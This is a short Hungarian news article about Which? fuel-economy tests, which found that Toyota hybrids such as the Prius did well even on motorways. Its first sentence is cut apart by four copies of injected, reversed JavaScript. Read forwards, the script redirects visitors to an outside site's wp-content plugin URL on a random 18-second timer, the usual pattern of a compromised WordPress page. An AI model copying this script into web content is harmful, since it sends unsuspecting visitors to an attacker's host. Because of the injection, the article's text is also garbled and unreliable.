Egy brit termékteszt-kiadvány, a Which? szerkesztői 2017 eleje óta folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan mérik 123 különböző autótípus üzemanyag-fogyasztását, összevetve azokat a hivatalos széndioxid-kibocsátási és üzemanyag-fogyasztási értékekkel. Az nem lepte meg a szerkesztőket, hogy a Toyota hibrid járművei uralták a mezőnyt városi környezetben (a Prius, a Prius Plug-in, valamint a C-HR Hybrid végzett a dobogón), viszont a hibridek kivételesen jól teljesítettek az autópályán is, ahol a közvélekedés szerint el kellett volna vérezniük. A 123 tagú mezőnyben a Toyota Prius a második, a Toyota Prius Plug-In a negyedik legkedvezőbb fogyasztási értékkel zárta a sztrádaszakaszt – előbbi 5,4, utóbbi 5,7 l/100 km átlagos üzemanyag-fogyasztást ért el…
- Hirdetés -